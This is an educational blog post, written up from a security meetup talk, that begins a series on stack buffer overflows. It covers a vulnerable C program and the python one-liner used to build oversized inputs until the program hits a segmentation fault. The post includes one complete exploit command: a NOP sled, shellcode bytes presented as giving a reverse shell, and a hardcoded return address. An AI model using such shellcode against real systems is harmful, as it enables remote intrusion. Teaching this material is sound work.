I’m not sure about you, but I used to see news about some components suddenly known to be vulnerable to Buffer Overflow and the vendor released an emergency patch. I never had a chance to understand the Weakness in detail. I knew it’s another type of Remote Code Execute (RCE) but never explored. If you’re like me, let’s attempt to explore it, understand how eggxactly it happens, how to reproduce a Simple Buffer Overflow to get a reverse shell.
This post is a write-up of my original talk at Null Hyderabad on the 19th of October, 2019. It was a special full-day meetup as it was Null Hyd‘s 100th meet.
Let’s see How Eggxactly Buffer Overflow Flaws Work:
That’s how it works.
Just kidding! Before I begin, let’s talk about “eggxactly”.
The Story of an Egg:
For someone who hasn’t seen, touched, or knows about Egg, it’s just strange object. It looks solid when touched until it’s hit hard and breaks. No Offense to any living animals. Similarly, any technical concept looks hard until we spend some time to explore, play around, and learn. It becomes easy after we know about it. All we have to do is to try to break it until we know about it.
Let’s break the Buffer Overflow Egg!
Wait, isn’t Buffer Overflow Outdated?
Yes, it is very old. It’s being seen for decades. Buffer Overflow doesn’t happen in most modern programming languages which do not allow the programmers to manage memory directly.
A lot of these modern technologies contain libraries that are written in the old language. For example, the recent Buffer Overflow Vulnerabilities seen with Php’s WordPress, Drupal framework are because it included libraries that were written in C. There are other vulnerabilities that are similar to Buffer Overflow, and as an InfoSec Enthusiast, it’s still important to learn and understand about this weakness. There is some good discussion on this stackoverflow thread.
Applications of Buffer Overflow:
Buffer Overflow gives arbitrary command execution on the target using a victim service or user.
- If you can overflow a service that’s running as root, you can obtain root shell from a low privileged user: Privilege Escalation.
- If the victim service is running as a low privilege user, you can get a user privileged command execution on a remote system, then look for Privilege Escalation possibilities in any other services in the target.
Sounds interesting right, let’s get into the details. Let me show you the magical code I pasted on the POC Video:
./vuln $(python -c ‘print “\x90″*(508-40-105)+”\xd9\xec\xbb\x29\x3c\xe5\x0d\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x14\x83\xc7\x04\x31\x5f\x15\x03\x5f\x15\xcb\xc9\xd4\xd6\xfc\xd1\x44\xaa\x51\x7c\x69\xa5\xb4\x30\x0b\x78\xb6\x6a\x8a\xd0\xde\x8e\x32\xc4\x42\xe5\x22\xb7\x2a\x70\xa3\x5d\xac\xda\xe9\x22\xb9\x9a\xf5\x91\xbd\xac\x90\x18\x3d\x8f\xec\xc5\xf0\x90\x9e\x53\x60\xae\xf8\xae\xf4\x99\x81\xc8\x9c\x36\x5d\x5a\x34\x21\x8e\xfe\xad\xdf\x59\x1d\x7d\x73\xd3\x03\xcd\x78\x2e\x43″+ “\x90” *40 +”\x70\xef\xff\xbf”‘)
Confusing? Let’s break it down. I’m running a executable ./vuln and passing some command line argument to it. Before we get to the long argument value, let’s first take a look at the vuln executable. It’s compiled binary from vuln.c and the source of it is:
The main function declares a string buffer variable of size 500 and copies the first command line argument value to it. That’s it. If we pass ./vuln hi, the value hi is copied to buffer.
On the other part of the magical string, some python code is seen. Le’s break that.
When we run
echo A
A is printed on the console. When we run
python -c 'print "hi" '
-c is the way to execute a simple one-liner python statement and exit from it without entering into its python’s interactive shell. The above statement uses python to print hi. When we run
echo $(python -c 'print "A" * 10')
Now the letter A is printed 10 times. The reason we are using this method is to build some very long list of string and pass it on ./vuln. We can use this method to pass an argument to our ./vuln executable as follows:
./vuln $(python -c 'print "A" * 10 ')
/vuln gets A 10 times in the above situation.
As a final stage of the preparation, let’s pass a real long string, like 550, to ./vuln and see what happens.
./vuln $(python -c 'print "A" * 550')
It errored out as a Segmentation fault.
This the hint we know something unexpected happened to the execution.
Let’s stop here and continue in the next part of this series.